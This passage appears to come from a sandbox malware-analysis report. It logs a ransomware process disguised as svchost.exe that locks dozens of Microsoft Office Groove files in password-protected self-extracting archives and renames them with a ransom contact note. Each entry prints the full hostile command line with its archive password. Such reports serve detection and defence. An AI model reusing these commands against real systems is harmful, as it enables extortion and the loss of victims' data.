- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\BodyPaneBackground.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\BodyPaneBackground.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1928
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImage.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImage.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2480
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImageMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImageMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3008
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\MarkupIconImages.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\MarkupIconImages.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1104
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\MarkupIconImagesMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\MarkupIconImagesMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1828
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrow.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrow.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2224
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrowMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrowMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1728
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\Attachments.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\Attachments.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1036
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BREAK.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BREAK.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1000
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BUTTON.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BUTTON.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2008
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CHECKBOX.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CHECKBOX.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2212
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\COMBOBOX.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\COMBOBOX.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2468
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CONTACT.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CONTACT.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2112
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CURRENCY.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CURRENCY.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1404
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DATE.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DATE.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2256
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DATETIME.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DATETIME.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2524
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DigitalInk.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DigitalInk.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2056
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\EmbeddedView.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\EmbeddedView.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2236
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\HEADING.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\HEADING.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:996
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\IMAGE.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\IMAGE.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2564
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LINE.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LINE.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2392
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LISTBOX.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LISTBOX.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:760
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\NUMERIC.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\NUMERIC.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1516
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\PASSWORD.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\PASSWORD.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2944
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\RADIO.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\RADIO.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2660
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\SectionHeading.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\SectionHeading.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2228
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\StaticText.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\StaticText.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2356
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTAREA.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTAREA.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2796
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTBOX.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTBOX.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:276
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTVIEW.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTVIEW.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3004
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\UnformattedNumeric.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\UnformattedNumeric.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2288
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIcons.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIcons.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2600
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIconsMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIconsMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2628
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormToolImages.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormToolImages.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2712
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\GrooveFormsMetaData.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\GrooveFormsMetaData.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2632
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\ViewHeaderPreview.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\ViewHeaderPreview.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:888
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\AddToViewArrow.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\AddToViewArrow.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2976
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\AddToViewArrowMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\AddToViewArrowMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:668
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIcons.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIcons.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1648
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIconsMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIconsMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:372
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormToolImages.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormToolImages.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1888
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\ViewHeaderPreview.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\ViewHeaderPreview.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1720
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrow.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrow.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1892
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrowMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrowMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1428
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIcons.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIcons.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1192
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIconsMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIconsMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2052
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormToolImages.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormToolImages.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1884
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ViewHeaderPreview.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ViewHeaderPreview.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:812
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIcons.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIcons.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1612
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIconsMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIconsMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2676
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\InfoPathWelcomeImage.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\InfoPathWelcomeImage.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2124
- C:\ProgramData\msvkp\svchost.exe
